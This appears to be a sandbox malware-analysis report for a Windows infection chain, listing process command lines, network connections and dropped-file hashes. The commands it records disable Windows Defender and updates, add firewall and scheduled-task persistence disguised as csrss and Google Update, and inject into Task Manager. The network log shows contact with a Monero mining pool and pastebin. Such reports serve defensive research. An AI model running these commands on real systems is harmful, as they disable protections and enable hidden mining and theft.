C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10472 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=10216 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 39.142.81.104.in-addr.arpa udp
RU 193.233.255.73:80 193.233.255.73 tcp
US 8.8.8.8:53 73.255.233.193.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
US 8.8.8.8:53 www.epicgames.com udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 store.steampowered.com udp
US 34.227.175.231:443 www.epicgames.com tcp
US 8.8.8.8:53 twitter.com udp
NL 104.85.0.101:443 store.steampowered.com tcp
US 104.244.42.1:443 twitter.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 steamcommunity.com udp
JP 23.207.106.113:443 steamcommunity.com tcp
US 8.8.8.8:53 101.0.85.104.in-addr.arpa udp
US 8.8.8.8:53 231.175.227.34.in-addr.arpa udp
US 8.8.8.8:53 1.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 113.106.207.23.in-addr.arpa udp
US 8.8.8.8:53 162.47.239.18.in-addr.arpa udp
US 8.8.8.8:53 community.akamai.steamstatic.com udp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
US 8.8.8.8:53 www.paypal.com udp
US 151.101.1.21:443 www.paypal.com tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 88.221.25.169:80 apps.identrust.com tcp
US 8.8.8.8:53 160.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 169.25.221.88.in-addr.arpa udp
US 8.8.8.8:53 206.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 21.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 store.akamai.steamstatic.com udp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 171.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 static-assets-prod.unrealengine.com udp
US 8.8.8.8:53 tracking.epicgames.com udp
US 3.93.123.75:443 tracking.epicgames.com tcp
US 8.8.8.8:53 100.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
US 18.239.36.73:443 static-assets-prod.unrealengine.com tcp
US 18.239.36.73:443 static-assets-prod.unrealengine.com tcp
US 8.8.8.8:53 i.ytimg.com udp
NL 216.58.214.22:443 i.ytimg.com tcp
US 8.8.8.8:53 api.twitter.com udp
US 8.8.8.8:53 abs.twimg.com udp
US 8.8.8.8:53 pbs.twimg.com udp
US 104.244.42.194:443 api.twitter.com tcp
US 93.184.220.70:443 pbs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 8.8.8.8:53 video.twimg.com udp
US 8.8.8.8:53 t.co udp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 104.244.42.69:443 t.co tcp
US 192.229.220.133:443 video.twimg.com tcp
US 8.8.8.8:53 73.36.239.18.in-addr.arpa udp
US 8.8.8.8:53 75.123.93.3.in-addr.arpa udp
US 8.8.8.8:53 22.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 70.220.184.93.in-addr.arpa udp
US 8.8.8.8:53 194.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 141.21.199.152.in-addr.arpa udp
US 8.8.8.8:53 69.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 133.220.229.192.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 static.ads-twitter.com udp
NL 199.232.148.157:443 static.ads-twitter.com tcp
US 8.8.8.8:53 www.paypalobjects.com udp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 facebook.com udp
IE 163.70.151.35:443 facebook.com tcp
US 8.8.8.8:53 157.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 25.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 fbcdn.net udp
IE 163.70.151.35:443 fbcdn.net tcp
US 8.8.8.8:53 www.recaptcha.net udp
NL 172.217.168.227:443 www.recaptcha.net tcp
US 8.8.8.8:53 fbsbx.com udp
NL 172.217.168.227:443 www.recaptcha.net udp
US 8.8.8.8:53 zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com udp
US 104.17.209.240:443 zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com tcp
US 8.8.8.8:53 240.209.17.104.in-addr.arpa udp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
US 8.8.8.8:53 t.paypal.com udp
US 151.101.1.35:443 t.paypal.com tcp
US 8.8.8.8:53 login.steampowered.com udp
JP 23.207.106.113:443 login.steampowered.com tcp
US 8.8.8.8:53 35.1.101.151.in-addr.arpa udp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
US 8.8.8.8:53 play.google.com udp
US 18.239.36.73:443 static-assets-prod.unrealengine.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
RU 193.233.255.73:80 193.233.255.73 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
NL 194.169.175.118:80 194.169.175.118 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 118.175.169.194.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
NL 104.85.0.101:443 store.steampowered.com tcp
JP 23.207.106.113:443 login.steampowered.com tcp
FI 77.91.124.86:19084 tcp
NL 216.58.214.22:443 i.ytimg.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.130:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 rr1---sn-5hne6nzs.googlevideo.com udp
NL 74.125.8.102:443 rr1---sn-5hne6nzs.googlevideo.com tcp
NL 74.125.8.102:443 rr1---sn-5hne6nzs.googlevideo.com tcp
NL 142.250.179.130:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 130.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 102.8.125.74.in-addr.arpa udp
NL 74.125.8.102:443 rr1---sn-5hne6nzs.googlevideo.com tcp
NL 74.125.8.102:443 rr1---sn-5hne6nzs.googlevideo.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.71:4341 tcp
NL 74.125.8.102:443 rr1---sn-5hne6nzs.googlevideo.com tcp
NL 74.125.8.102:443 rr1---sn-5hne6nzs.googlevideo.com tcp
US 8.8.8.8:53 i3.ytimg.com udp
GB 216.58.208.110:443 i3.ytimg.com tcp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
US 8.8.8.8:53 api.steampowered.com udp
JP 23.207.106.113:443 api.steampowered.com tcp
NL 142.251.36.1:443 yt3.ggpht.com udp
US 8.8.8.8:53 71.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 110.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 stim.graspalace.com udp
US 188.114.96.0:80 stim.graspalace.com tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 rr1---sn-4g5ednds.googlevideo.com udp
DE 74.125.162.198:443 rr1---sn-4g5ednds.googlevideo.com tcp
DE 74.125.162.198:443 rr1---sn-4g5ednds.googlevideo.com tcp
DE 74.125.162.198:443 rr1---sn-4g5ednds.googlevideo.com udp
US 8.8.8.8:53 198.162.125.74.in-addr.arpa udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
US 8.8.8.8:53 static.doubleclick.net udp
NL 172.217.168.202:443 jnn-pa.googleapis.com tcp
NL 142.251.36.6:443 static.doubleclick.net tcp
NL 172.217.168.202:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 202.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 6.36.251.142.in-addr.arpa udp
BG 171.22.28.213:80 171.22.28.213 tcp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
US 8.8.8.8:53 youtube.com udp
NL 142.250.179.142:443 youtube.com tcp
US 149.40.62.171:15666 tcp
US 8.8.8.8:53 api.ipify.org udp
US 64.185.227.156:443 api.ipify.org tcp
US 8.8.8.8:53 142.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 171.62.40.149.in-addr.arpa udp
US 8.8.8.8:53 156.227.185.64.in-addr.arpa udp
IT 185.196.9.171:80 185.196.9.171 tcp
NL 172.217.168.227:443 www.recaptcha.net udp
NL 172.217.168.227:443 www.recaptcha.net tcp
US 8.8.8.8:53 talon-website-prod.ecosec.on.epicgames.com udp
US 104.18.41.136:443 talon-website-prod.ecosec.on.epicgames.com tcp
US 104.244.42.194:443 api.twitter.com tcp
US 104.244.42.194:443 api.twitter.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 171.9.196.185.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 136.41.18.104.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
US 194.49.94.11:80 194.49.94.11 tcp
US 8.8.8.8:53 1.202.248.87.in-addr.arpa udp
US 8.8.8.8:53 11.94.49.194.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.12.31:443 api.ip.sb tcp
US 8.8.8.8:53 31.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 rr3---sn-4g5lznle.googlevideo.com udp
DE 74.125.163.200:443 rr3---sn-4g5lznle.googlevideo.com udp
US 8.8.8.8:53 200.163.125.74.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.paypal.com udp
US 8.8.8.8:53 www.paypalobjects.com udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
US 8.8.8.8:53 28.26.214.95.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 0638f326-6987-4e16-9002-b3806caefe75.uuid.statsexplorer.org udp
US 8.8.8.8:53 i.ytimg.com udp
NL 216.58.214.22:443 i.ytimg.com udp
US 8.8.8.8:53 rr1---sn-4g5ednds.googlevideo.com udp
DE 74.125.162.198:443 rr1---sn-4g5ednds.googlevideo.com udp
US 8.8.8.8:53 www.recaptcha.net udp
NL 172.217.168.227:443 www.recaptcha.net udp
US 8.8.8.8:53 www.epicgames.com udp
US 34.230.126.111:443 www.epicgames.com tcp
US 8.8.8.8:53 111.126.230.34.in-addr.arpa udp
US 8.8.8.8:53 194.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 talon-service-prod.ecosec.on.epicgames.com udp
US 104.18.41.136:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 104.18.41.136:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 8.8.8.8:53 js.hcaptcha.com udp
US 104.19.219.90:443 js.hcaptcha.com tcp
US 8.8.8.8:53 server6.statsexplorer.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun.l.google.com udp
US 74.125.128.127:19302 stun.l.google.com udp
BG 185.82.216.108:443 server6.statsexplorer.org tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 127.128.125.74.in-addr.arpa udp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 8.8.8.8:53 108.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.97.0:443 walkinglate.com tcp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 51.15.193.130:14433 xmr-eu1.nanopool.org tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 newassets.hcaptcha.com udp
US 8.8.8.8:53 130.193.15.51.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
FR 51.255.34.118:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 118.34.255.51.in-addr.arpa udp
US 8.8.8.8:53 hcaptcha.com udp
US 8.8.8.8:53 server6.statsexplorer.org udp
BG 185.82.216.108:443 server6.statsexplorer.org tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
DE 172.217.23.194:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 194.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 rr5---sn-q4flrnez.googlevideo.com udp
US 173.194.191.202:443 rr5---sn-q4flrnez.googlevideo.com udp
US 8.8.8.8:53 api2.hcaptcha.com udp
US 8.8.8.8:53 202.191.194.173.in-addr.arpa udp
US 8.8.8.8:53 rr3---sn-4g5lznle.googlevideo.com udp
DE 74.125.163.200:443 rr3---sn-4g5lznle.googlevideo.com udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 63.141.182.52.in-addr.arpa udp
FI 77.91.124.86:19084 tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NH1rc74.exe

MD5 8e29f372a23cfa930f11fff304829fa0
SHA1 92c909c4b297171ae3d4c28101c9716c88392654
SHA256 d31f55dde1383850bf42615bc5360c65c7bc01ca3904481af8068d20e550a850
SHA512 2bb74133cdbf16969b7dbd27132e352daeaab8e2214d36172a4feb1421665b53aa3f78b8bbcb667f9f66befc6cd82cc347286eb3542adf2a46f114d544eac389

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NH1rc74.exe

MD5 8e29f372a23cfa930f11fff304829fa0
SHA1 92c909c4b297171ae3d4c28101c9716c88392654
SHA256 d31f55dde1383850bf42615bc5360c65c7bc01ca3904481af8068d20e550a850
SHA512 2bb74133cdbf16969b7dbd27132e352daeaab8e2214d36172a4feb1421665b53aa3f78b8bbcb667f9f66befc6cd82cc347286eb3542adf2a46f114d544eac389

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TV5CN97.exe

MD5 15c5437345a9dcd84a9a240a354f1708
SHA1 a2446d3fcc6c9ad6b8debecf33e6e4829590e88a
SHA256 7d7d655e3edf481fa862c93be98f67e0550f59a3f9d07a014ef120070a63dd79
SHA512 ce3b3e2e6d2ff339a3731fb89b2fa54b92b23257739fb6eb35845e50ec0186faa1fb5b423cfe07fdc0f4338bce3b4bbcbb91b1f7483bcd9290f368be1342f719

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TV5CN97.exe

MD5 15c5437345a9dcd84a9a240a354f1708
SHA1 a2446d3fcc6c9ad6b8debecf33e6e4829590e88a
SHA256 7d7d655e3edf481fa862c93be98f67e0550f59a3f9d07a014ef120070a63dd79
SHA512 ce3b3e2e6d2ff339a3731fb89b2fa54b92b23257739fb6eb35845e50ec0186faa1fb5b423cfe07fdc0f4338bce3b4bbcbb91b1f7483bcd9290f368be1342f719

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jh6MS90.exe

MD5 f13212995ed965c5b2515672a85a6ebe
SHA1 e908a0e81b1daefacb91f68c5d21636ce40e2a22
SHA256 f2a9625b022c44961f199cd62aa58ee95acfeec1857f7f020fa443f091ac4180
SHA512 e9656745ae6ce23499db6a575184b8ea41ac7a6cc73e47664ad79ce6f430504e228493c076ca87cd383e80f4df1ceabc373106ae74e48bdf822a69b84cf53e47

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jh6MS90.exe

MD5 f13212995ed965c5b2515672a85a6ebe
SHA1 e908a0e81b1daefacb91f68c5d21636ce40e2a22
SHA256 f2a9625b022c44961f199cd62aa58ee95acfeec1857f7f020fa443f091ac4180
SHA512 e9656745ae6ce23499db6a575184b8ea41ac7a6cc73e47664ad79ce6f430504e228493c076ca87cd383e80f4df1ceabc373106ae74e48bdf822a69b84cf53e47

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AX4Kl05.exe

MD5 36800c632283f08616a8d3751698a2e2
SHA1 43eceb03313a7048a0ce42d4df2ae22bdf1cfcb5
SHA256 a662df6d5902c441f438f632dc786279008d1e5d03ac4175ee3c1223de6de745
SHA512 60ed3d9dac5dbedd277f47a1ea02fa8c11289ab89258a5d888cedef12a19b1fddd1efa1c7e3ebd77516918249d085b64b74bfa80070010f06b093a29227af92d

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AX4Kl05.exe

MD5 36800c632283f08616a8d3751698a2e2
SHA1 43eceb03313a7048a0ce42d4df2ae22bdf1cfcb5
SHA256 a662df6d5902c441f438f632dc786279008d1e5d03ac4175ee3c1223de6de745
SHA512 60ed3d9dac5dbedd277f47a1ea02fa8c11289ab89258a5d888cedef12a19b1fddd1efa1c7e3ebd77516918249d085b64b74bfa80070010f06b093a29227af92d

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\kd2hM38.exe

MD5 acbd873b0f5587ed7a48485f64479678
SHA1 5216d50413e8ffef80174d915f9f214c8dcb5442
SHA256 aceb70791c3e8cc0d7fda93dca5a16d432aaf8dd46b00db23beacc35cbe35106
SHA512 00128b5264385326c68b8fd2c00e3bb2390cab4cd8c6ebc30a4b930f7ef3203763a11537152977dd6e9c24e6a02a7025385bbfdf2bea9bc8bb44773a233860fc

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\kd2hM38.exe

MD5 acbd873b0f5587ed7a48485f64479678
SHA1 5216d50413e8ffef80174d915f9f214c8dcb5442
SHA256 aceb70791c3e8cc0d7fda93dca5a16d432aaf8dd46b00db23beacc35cbe35106
SHA512 00128b5264385326c68b8fd2c00e3bb2390cab4cd8c6ebc30a4b930f7ef3203763a11537152977dd6e9c24e6a02a7025385bbfdf2bea9bc8bb44773a233860fc

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1kQ67tv6.exe

MD5 d2ad3448f561d185a46404483f673022
SHA1 4eebb4b41004b26a2acb074fa41ecf568b51b216
SHA256 acf233d7500620412f0cd5cd8c93c8c0a46b7a58cd9ffea839e9d90df414df02
SHA512 32bdb099a9116acd662fff72ae5e4e9ad1bc8c2c410becaaba091d5189b838e4ee53d8b8cf9188967fa4abd8b9b373db4008e227cf66dd05429dde8cbfb2fe09

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1kQ67tv6.exe

MD5 d2ad3448f561d185a46404483f673022
SHA1 4eebb4b41004b26a2acb074fa41ecf568b51b216
SHA256 acf233d7500620412f0cd5cd8c93c8c0a46b7a58cd9ffea839e9d90df414df02
SHA512 32bdb099a9116acd662fff72ae5e4e9ad1bc8c2c410becaaba091d5189b838e4ee53d8b8cf9188967fa4abd8b9b373db4008e227cf66dd05429dde8cbfb2fe09

memory/4764-42-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Vq7402.exe

MD5 4f0672241efb325e0210a3048ddf0ddc
SHA1 68bcbf0edafcb66587e465b5156393cc4a979f11
SHA256 4169d0940e900d87adeef0ed41e359a2f2d6d0101af8e42f223c978625610c05
SHA512 61256f9a257c2d41b01203956803ce10aa954ea3d4133c525a8e3b2c414a3dded29d02e9705f172ff31dc2c9b6af70187e32e69e46a704a980523fed7e66c032

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Vq7402.exe

MD5 4f0672241efb325e0210a3048ddf0ddc
SHA1 68bcbf0edafcb66587e465b5156393cc4a979f11
SHA256 4169d0940e900d87adeef0ed41e359a2f2d6d0101af8e42f223c978625610c05
SHA512 61256f9a257c2d41b01203956803ce10aa954ea3d4133c525a8e3b2c414a3dded29d02e9705f172ff31dc2c9b6af70187e32e69e46a704a980523fed7e66c032

memory/4764-46-0x00000000749B0000-0x0000000075160000-memory.dmp

memory/3684-47-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3684-48-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3684-49-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3684-51-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Ze50cJ.exe

MD5 ff240582f795096f661e2bcada811c80
SHA1 8dcfcdf66fb4626e64aabdc7ae11d03af9511aa2
SHA256 2666fb99c427f00702e17718499b9660d30853708d9dbedab9e7cee776c4cd07
